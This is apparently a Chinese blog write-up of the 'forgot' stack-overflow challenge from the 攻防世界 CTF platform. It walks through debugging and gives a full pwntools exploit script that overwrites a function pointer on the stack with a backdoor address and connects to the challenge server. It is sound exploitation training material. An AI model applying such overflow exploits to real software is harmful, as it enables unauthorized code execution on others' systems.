《攻防世界》forgot栈空间题

wuchangjian2021-11-16 15:51:22编程学习

哈哈哈,讲下这题的思路,拿到题目又是一大堆的字符串显示在控制台上,本想着又是一道逻辑题,披着逆向算法的外套,害,没办法继续分析

前面输入name用了fgets函数但是限制输入长度了,所以直接忽略,然后就是输入一个数对其进行简单的小算法了,我显示分析了一波算法,然后根据出题人的提示说这个,但是我好像还是摸不清题目的漏洞在哪里,就一直摸摸摸,先是简单的看了下全局伪代码,加上程序运行状况,发现你输入的数就算是通过了9层判断条件好像也是一样的打印一些字符串

在这里插入图片描述

这十个函数里面都是一样的没什么区别

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2bC7XCZd-1637048344211)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116143753691.png)]

然后出题人那个提示我也不知道有什么关系,可能是我太菜了,没有找到题目真正的考点吧。。。发现程序没有什么特别之处,就直接进行溢出了

编写溢出payload代码

z('b *0x8048a61')
sla('> ','admin')
payload =   b'a'*0x74 + b'a' * 4 + p32(0x80486CC)
sla('> ',payload)

运行后发现程序在这个地方卡住了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VZpwFYHo-1637048344212)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116145723577.png)]

看了下这时候的栈发现实际情况少填充了4位

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YSPwh9bx-1637048344213)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116145858096.png)]

但是我添加了4位数据后,程序依旧卡死在这个地方了,然后我就在这个地方下断点看看正常情况下这里的数据是什么

修改后payload

z('b *0x8048a61')
sla('> ','admin')
payload =   b'aaaa'
sla('> ',payload)
p.interactive()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Yqcb1dkR-1637048344215)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116150151492.png)]

发现它call了0x8048618,然后就跳转到这个地址了,上面一行发现这个值就是从栈里面取得,那么看看栈

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-peTEq2oU-1637048344216)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116153402998.png)]

这里不就是那十个变量的位置吗,那么根据ida得出相对距离,对刚才0x8048618地址进行覆盖成后门函数的地址

z('b *0x8048a61')
sla('> ','admin')
payload =   b'a' * (0x78-0x54) + p32(0x80486CC)

ok获取flag

最终payload

from pwn import *
from LibcSearcher import *

context (log_level = 'debug' ,bits=32 ,os = 'linux' ,arch = 'i386' ,terminal = ['tmux' , 'splitw', '-h'])
#context (log_level = 'debug' ,bits= 32,os = 'linux' ,arch = 'i386' ,terminal = ['gnome-terminal' , '-x','sh', '-c'])


# Interface
local = 1
binary_name = "forgot"
ip = "111.200.241.244"
port = 52418

if local:
        p = process(["./" + binary_name])
        e = ELF("./" + binary_name)
        # libc = e.libc
else:
        p = remote(ip, port)
        e = ELF("./" + binary_name)
        # libc = ELF("libc-2.23.so")


def z(a=''):
        if local:
                gdb.attach(p, a)
                if a == '':
                        raw_input()
        else:
                pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)

z('b *0x8048a61')
sla('> ','admin')
payload =   b'a' * (0x78-0x54) + p32(0x80486CC)
sla('> ',payload)

p.interactive()

相关文章

数列分段—XDOJ—2

来源 西安电子科技大学——XDOJ网上C语言编程题2  问题描述 给定一个整数数列...

周末湖南晴热高温持续,最高温局地将超41℃

2022-08-19 14:02:49 据湖南气象网,三湘大地高温继续...

深度学习BackPropagation

目录 1.链式法则 2.前向传播 3.后向传播 4.计算方式整理 5.总结...

男游客景区喂梅花鹿被踢,景区回应:正处于发情期,不要撩逗

男游客景区喂梅花鹿被踢,景区回应:正处于发情期,不要撩逗

2022-08-25 19:40:10 8月24日,黑龙江伊春金山梅花...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。